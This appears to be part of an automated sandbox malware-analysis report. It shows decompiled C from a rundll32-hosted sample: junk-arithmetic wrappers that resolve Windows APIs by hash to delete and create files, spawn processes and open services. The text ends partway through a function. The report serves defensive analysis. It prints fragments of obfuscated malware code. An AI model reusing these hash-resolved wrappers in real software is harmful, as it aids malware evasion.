				_v8 = _v8 ^ 0x00c83f8f;
				E04C7EB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
				_t75 = FindCloseChangeNotification(_a4); // executed
				return _t75;
			}

0x04c9153e
0x04c91543
0x04c91548
0x04c9154f
0x04c91558
0x04c9155f
0x04c9156b
0x04c91570
0x04c91575
0x04c9157c
0x04c91583
0x04c9158a
0x04c91591
0x04c91595
0x04c9159c
0x04c915a3
0x04c915ad
0x04c915b2
0x04c915ba
0x04c915bf
0x04c915c4
0x04c915cb
0x04c915d6
0x04c915e6
0x04c915e9
0x04c915f3
0x04c915f6
0x04c9160a
0x04c91615
0x04c9161a

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 04C91615

Strings

d , xrefs: 04C9158A
Zs, xrefs: 04C9154F

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: aed0e12c851c9f16c6dd5403d1fc0c604e793f5b98ca8976a4f2a692a768c476
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: B8214CB5D00209EBEB04DFA5C84999DBBB2EB40304F10C09DE614B7250D7B96B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 04C7D061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E04C7D061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t69;

				_push(_a12);
				_t69 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04C8FE29(_t54);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xa62646;
				_v32 = 0x27199b;
				_v20 = 0x942c55;
				_v20 = _v20 | 0xf0368afe;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xfbcaf84d;
				_v20 = _v20 ^ 0x217d6c33;
				_v16 = 0xf28622;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0xeb4a9877;
				_v16 = _v16 ^ 0x2aded5e4;
				_v16 = _v16 ^ 0xc19eb21f;
				_v12 = 0x4a5837;
				_v12 = _v12 ^ 0xa3e571b7;
				_v12 = _v12 + 0xffff6305;
				_t65 = 0x6e;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x01794185;
				_v8 = 0xa209ee;
				_v8 = _v8 + 0x62d2;
				_v8 = _v8 ^ 0x3d892cf6;
				_v8 = _v8 | 0x5ca7d1ce;
				_v8 = _v8 ^ 0x7da8dabc;
				E04C7EB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
				_t63 = DeleteFileW(_t69); // executed
				return _t63;
			}

0x04c7d068
0x04c7d06b
0x04c7d06d
0x04c7d070
0x04c7d074
0x04c7d075
0x04c7d07a
0x04c7d081
0x04c7d087
0x04c7d08e
0x04c7d095
0x04c7d09c
0x04c7d0a3
0x04c7d0a7
0x04c7d0ae
0x04c7d0b5
0x04c7d0bc
0x04c7d0c0
0x04c7d0c7
0x04c7d0ce
0x04c7d0d5
0x04c7d0dc
0x04c7d0e3
0x04c7d0ef
0x04c7d0f7
0x04c7d0fa
0x04c7d101
0x04c7d108
0x04c7d10f
0x04c7d116
0x04c7d11d
0x04c7d13c
0x04c7d145
0x04c7d14b

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04C7D145

Strings

7XJ, xrefs: 04C7D0D5
3l}!, xrefs: 04C7D0AE

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: 8a4c3f6aae84277a930591de65111b4df822dbc0f2244116df931126cd2a9a01
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: 8A2145B5D00318AFDF08DFA4C98A9DEFBB0FF14308F108188E966A6210D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 04C92C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E04C92C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04C8FE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				E04C7EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x04c92c2c
0x04c92c31
0x04c92c33
0x04c92c36
0x04c92c37
0x04c92c3a
0x04c92c3d
0x04c92c3e
0x04c92c41
0x04c92c44
0x04c92c47
0x04c92c4a
0x04c92c4b
0x04c92c4e
0x04c92c4f
0x04c92c51
0x04c92c52
0x04c92c57
0x04c92c61
0x04c92c64
0x04c92c67
0x04c92c6e
0x04c92c72
0x04c92c76
0x04c92c7d
0x04c92c84
0x04c92c8b
0x04c92c92
0x04c92c99
0x04c92ca0
0x04c92ca4
0x04c92cab
0x04c92cb2
0x04c92cb9
0x04c92cc0
0x04c92cc7
0x04c92ce8
0x04c92d02
0x04c92d09

APIs

CreateProcessW.KERNEL32(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04C92D02

Strings

3HS, xrefs: 04C92C57

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: ab10be56700caa447f08ff04ea2214ff43203ce1914e81e8c91bc53f38b4810b
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: 6E21F372800248BBCF159F96DC0ACDFBFB9EF85704F108188F915A2220C3B59A24DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04C945CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E04C945CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t51;
				void* _t60;
				WCHAR* _t64;

				_push(_a48);
				_t64 = __ecx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04C8FE29(_t51);
				_v28 = 0x204d4f;
				_v24 = 0;
				_v20 = 0xd27984;
				_v20 = _v20 | 0x43788b11;
				_v20 = _v20 ^ 0x43f3df42;
				_v16 = 0xf976f1;
				_v16 = _v16 + 0xffff3d74;
				_v16 = _v16 | 0xfc5c4419;
				_v16 = _v16 ^ 0xfcfdb6fc;
				_v12 = 0xb7df7c;
				_v12 = _v12 + 0xffff3658;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x1f30f970;
				_v12 = _v12 ^ 0x12ab006a;
				_v8 = 0x8ba8ca;
				_v8 = _v8 | 0x62aa166a;
				_v8 = _v8 + 0xa2f6;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0xc33acf6c;
				E04C7EB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
				return _t60;
			}

0x04c945d2
0x04c945d7
0x04c945d9
0x04c945dc
0x04c945df
0x04c945e2
0x04c945e5
0x04c945e8
0x04c945eb
0x04c945ee
0x04c945f1
0x04c945f4
0x04c945f5
0x04c945f7
0x04c945f8
0x04c945fd
0x04c94607
0x04c9460a
0x04c94611
0x04c94618
0x04c9461f
0x04c94626
0x04c9462d
0x04c94634
0x04c9463b
0x04c94642
0x04c9465d
0x04c94660
0x04c94667
0x04c9466e
0x04c94675
0x04c9467c
0x04c94688
0x04c9468b
0x04c9469e
0x04c946b5
0x04c946bc

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 04C946B5

Strings

OM , xrefs: 04C945FD

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: 56b408d719bd45966d3f020b04ef5a4b4d071af061eb81d345f080c1207f02c0
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: 9721EE72801249BBCF05DFA9CD45CDEBFB6EF88304F508199F914A6220D3768A61EF90

Uniqueness

Uniqueness Score: -1.00%

Function 04C944FF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04C944FF(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				intOrPtr* _t57;
				void* _t58;
				signed int _t60;
				signed int _t61;

				E04C8FE29(_t47);
				_v20 = 0xa68a31;
				_t60 = 0x6d;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x00000260;
				_v16 = 0xfa9629;
				_v16 = _v16 + 0x734b;
				_v16 = _v16 ^ 0x638d356d;
				_v16 = _v16 ^ 0x637ea9c8;
				_v8 = 0x3f26ab;
				_v8 = _v8 ^ 0xcdd207a4;
				_v8 = _v8 ^ 0xb6eb62c4;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x0005a548;
				_v12 = 0xe291fe;
				_t61 = 0x24;
				_v12 = _v12 / _t61;
				_v12 = _v12 + 0x3d74;
				_v12 = _v12 ^ 0x00095158;
				_t57 = E04C7EB52(_t61, _t61, 0x418e972c, 0x54, 0xa2289af1);
				_t58 =  *_t57(_a24, 0, _a20, 0x28, __ecx, __edx, 0, _a8, 0x28, _a16, _a20, _a24); // executed
				return _t58;
			}

0x04c94517
0x04c9451c
0x04c9452d
0x04c94532
0x04c94537
0x04c9453e
0x04c94545
0x04c9454c
0x04c94553
0x04c9455a
0x04c94561
0x04c94568
0x04c9456f
0x04c94573
0x04c9457a
0x04c94584
0x04c9458c
0x04c9458f
0x04c94596
0x04c945b2
0x04c945c4
0x04c945c9

APIs

SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 04C945C4

Strings

XQ, xrefs: 04C94596

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID: XQ
API String ID: 3935143524-1200779947
Opcode ID: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
Instruction ID: c9ab6f205c9a39f71c89e99a40625d54e171ec0a8026aafae5227d59b06e3950
Opcode Fuzzy Hash: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
Instruction Fuzzy Hash: B1214A71E4020CFBEF04DFE5DC4AA9EBBB1EF54704F108189B910A6290D3B59A649F40

Uniqueness

Uniqueness Score: -1.00%

Function 04C7EE62, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E04C7EE62(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16, short* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				void* _t41;
				void* _t44;

				_push(_a20);
				_t44 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04C8FE29(_t34);
				_v20 = 0xea751a;
				_v20 = _v20 | 0xe9b69993;
				_v20 = _v20 ^ 0xe9f29d6b;
				_v16 = 0x605393;
				_v16 = _v16 | 0xcc974431;
				_v16 = _v16 ^ 0xccf8b40a;
				_v12 = 0x102a1a;
				_v12 = _v12 + 0xcb09;
				_v12 = _v12 ^ 0x001131dd;
				_v8 = 0x570378;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0xef617e60;
				_v8 = _v8 ^ 0xef696bf9;
				E04C7EB52(__ecx, __ecx, 0x5c98ffad, 5, 0x1f76e49f);
				_t41 = OpenServiceW(_t44, _a20, _a16); // executed
				return _t41;
			}

0x04c7ee69
0x04c7ee6c
0x04c7ee6e
0x04c7ee71
0x04c7ee74
0x04c7ee77
0x04c7ee7a
0x04c7ee7b
0x04c7ee7c
0x04c7ee81
0x04c7ee8b
0x04c7ee92
0x04c7ee99
0x04c7eea0
0x04c7eea7
0x04c7eeae
0x04c7eeb5
0x04c7eebc
0x04c7eec3
0x04c7eeca
0x04c7eece
0x04c7eed5
0x04c7eef6
0x04c7ef05
0x04c7ef0b

APIs

OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04C7EF05

Strings

`~a, xrefs: 04C7EECE

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: `~a
API String ID: 3098006287-142445290
Opcode ID: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
Instruction ID: 3c83156ddb377a3bdf1095921a18c7afb3edd603a87377fe1a0ef2db83b6cc83
Opcode Fuzzy Hash: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
Instruction Fuzzy Hash: B511F276C01218FBDF48EFA5DD0A8DEBFB5EB04314F108588F92562261D3B59A20EF91

Uniqueness

Uniqueness Score: -1.00%

Function 04C8648A, Relevance: 1.6, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E04C8648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t49;
				long _t52;

				_push(_a16);
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04C8FE29(_t41);
				_v12 = 0x3cd3f;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0xc677f757;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0188bcff;
				_v20 = 0x40fc9e;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x040306b1;
				_v16 = 0x159e9f;
				_v16 = _v16 + 0xffffd0d5;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x04433238;
				_v8 = 0x8a430d;
				_v8 = _v8 + 0xffffdfbc;
				_v8 = _v8 | 0x5356d001;
				_v8 = _v8 + 0x638e;
				_v8 = _v8 ^ 0x53d0144a;
				E04C7EB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
				return _t49;
			}

0x04c86491
0x04c86494
0x04c86496
0x04c86499
0x04c8649c
0x04c864a0
0x04c864a1
0x04c864a6
0x04c864b0
0x04c864b4
0x04c864bb
0x04c864bf
0x04c864c6
0x04c864cd
0x04c864d1
0x04c864d8
0x04c864df
0x04c864fa
0x04c864fd
0x04c86504
0x04c8650b
0x04c86512
0x04c86519
0x04c86520
0x04c86534
0x04c86543
0x04c86549

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 04C86543

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: f1b0ac698dd71fe6f9cd804cb59923d0b21ae8e8b801b19e93ea2b2c916479d3
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: C41100B2C0121DFBDF06DFA5D9098CEBFB4FB00318F108598E821A6250E3B59B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 04C8E8B6, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04C8E8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t29;
				void* _t37;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E04C8FE29(_t29);
				_v20 = 0xc8e76b;
				_v20 = _v20 | 0x270203a1;
				_v20 = _v20 ^ 0x27c97096;
				_v16 = 0x55aebc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00171a80;
				_v12 = 0xfad6fe;
				_v12 = _v12 ^ 0xd14a4d1d;
				_v12 = _v12 ^ 0xd1b10da7;
				_v8 = 0x428060;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x15de1a76;
				E04C7EB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
				_t37 = OpenSCManagerW(0, 0, _a12); // executed
				return _t37;
			}

0x04c8e8bd
0x04c8e8c2
0x04c8e8c5
0x04c8e8c6
0x04c8e8ca
0x04c8e8cb
0x04c8e8d0
0x04c8e8da
0x04c8e8e1
0x04c8e8e8
0x04c8e8ef
0x04c8e8f3
0x04c8e8fa
0x04c8e901
0x04c8e908
0x04c8e90f
0x04c8e92a
0x04c8e92d
0x04c8e941
0x04c8e94e
0x04c8e954

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 04C8E94E

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: a159422f294454e035d0d514fc2e48752b442a2b04cf37868190afe06051da30
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: 9511F77190221DFB9B04EFE99D468DFBFB4FF04308F118598E925B2211D3B19B149B95

Uniqueness

Uniqueness Score: -1.00%

Function 04C8D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04C8D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E04C7EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x04c8d120
0x04c8d124
0x04c8d12b
0x04c8d132
0x04c8d139
0x04c8d140
0x04c8d144
0x04c8d14b
0x04c8d14f
0x04c8d156
0x04c8d15d
0x04c8d164
0x04c8d16b
0x04c8d172
0x04c8d176
0x04c8d17d
0x04c8d184
0x04c8d18b
0x04c8d1ac
0x04c8d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 04C8D1B6

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: b9b8aec201b3af3e65b9fea6d3146d456e9c4b7355adf876911fb993fe9f7358
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 6711E2B1C4430DEBDB54DFE5D94A6DEFBB0EB00749F108588D521B6250D3B89B489F91

Uniqueness

Uniqueness Score: -1.00%

Function 04C9061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E04C9061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04C8FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E04C7EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x04c90624
0x04c90627
0x04c90629
0x04c9062c
0x04c9062f
0x04c90630
0x04c90631
0x04c90636
0x04c9063d
0x04c90644
0x04c9064b
0x04c9064f
0x04c90667
0x04c9066a
0x04c90671
0x04c90678
0x04c9067f
0x04c9068b
0x04c9068e
0x04c90695
0x04c9069c
0x04c906a3
0x04c906aa
0x04c906b1
0x04c906b8
0x04c906bf
0x04c906c6
0x04c906d9
0x04c906e5
0x04c906eb

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04C906E5

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 365f1e9f442820c542fd1500acccf44ce08a7d001b3cede98c522e45a484da30
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 802113B1C01309ABCF14DFA9D9499DEBFB5FB10354F108198E529A6251D3B49B04DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6048 Parent PID: 7160 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	13.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1074
Total number of Limit Nodes:	11

Executed Functions

Function 041952B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E041952B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t47;
				struct HINSTANCE__* _t59;
				signed int _t61;
				signed int _t62;
				WCHAR* _t68;

				_push(_a12);
				_t68 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E041AFE29(_t47);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x68392e;
				_v16 = 0xf5950b;
				_v16 = _v16 ^ 0xb3325752;
				_v16 = _v16 ^ 0xe58473b2;
